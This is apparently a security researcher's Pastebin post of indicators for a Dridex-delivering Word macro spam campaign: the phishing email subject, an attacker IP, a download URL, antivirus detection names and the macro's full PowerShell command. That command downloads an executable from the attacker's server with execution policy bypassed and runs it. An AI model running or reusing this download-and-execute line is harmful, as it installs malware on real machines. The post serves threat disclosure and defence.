Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Microsoft Word VBA Macro
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- *****
- Blog about this: http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html
- *****
- Malicious Email:
- Subject: 46175-Your Latest Documents from RS Components 835582046
- From: [email protected]
- *****
- 185.39.149.21
- hxxp://185.39.149.21/jsaxo8u/g39b2cx.exe
- *****
- cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.39.149.21/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
- *****
- Rising PE:Malware.XPACK-LNR/Heur!1.5594
- Tencent Trojan.Win32.Qudamah.Gen.2
- Dridex
Advertisement
Add Comment
Please, Sign In to add comment